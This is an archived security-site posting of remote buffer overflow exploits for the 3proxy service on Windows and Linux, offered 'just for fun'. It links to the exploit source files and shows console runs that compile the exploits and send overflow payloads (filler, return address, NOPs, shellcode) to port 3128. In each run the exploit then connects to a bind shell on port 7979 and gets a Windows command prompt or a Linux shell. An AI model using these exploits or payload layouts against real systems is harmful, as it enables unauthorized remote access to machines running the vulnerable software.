Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Microsoft(multi) :: tb10665.htm

3proxy: (linux/win32 service) remote buffer overflow exploits.



3proxy: (linux/win32 service) remote buffer overflow exploits.
3proxy: (linux/win32 service) remote buffer overflow exploits.



just for fun...

original exploit references:
http://fakehalo.us/x3proxy-win32.c 
http://fakehalo.us/x3proxy.c 


 example(win32 service):
-------------------------------------------------------------------------

[v9@fhalo v9]$ gcc x3proxy-win32.c -o x3proxy-win32
[v9@fhalo v9]$ ./x3proxy-win32 -h desktop.fakehalo.lan
[*] 3proxy[v0.5.3g]: (win32 service) remote buffer overflow exploit.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) 

[*] target: desktop.fakehalo.lan:3128
[*] return address($eip/"CALL ESP"): 0x7c81518b
[*] attempting to connect: desktop.fakehalo.lan:3128.
[*] successfully connected: desktop.fakehalo.lan:3128.
[*] sending string:
[+]  GET /[FILLERx1064][EIP/"CALL ESP"][NOPSx32][SHELLCODE]\n
[+]  Host: [FILLERx999]\n\n
[*] closing connection.

[*] attempting to connect: desktop.fakehalo.lan:7979.
[*] successfully connected: desktop.fakehalo.lan:7979.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


 example(linux):
-------------------------------------------------------------------------

[v9@fhalo v9]$ gcc x3proxy.c -o x3proxy
[v9@fhalo v9]$ ./x3proxy -h XXXXXXX.net -r 0x0805333c
[*] 3proxy[v0.5.3g]: (linux) remote buffer overflow exploit.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) 

[*] target                      : XXXXXXX.net:3128
[*] shellcode type              : bindshell(port=7979)
[*] return address($eip)        : 0x0805333c(+0=0x0805333c)
[*] attempting to connect: XXXXXXX.net:3128.
[*] successfully connected: XXXXXXX.net:3128.
[*] sending string: "GET /[NOPS][SHELLCODE][RETADDR]\nHost: [FILLER]\n\n"
[*] closing connection.

[*] attempting to connect: XXXXXXX.net:7979.
[*] successfully connected: XXXXXXX.net:7979.

Linux XXXXXXX.net 2.6.18-gentoo-r2 #1 Sun Nov 12 11:31:19 PST 2006 i686
Intel(R) Pentium(R) 4 CPU 1300MHz GenuineIntel GNU/Linux
uid=515(v9) gid=572(v9) groups=572(v9)



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH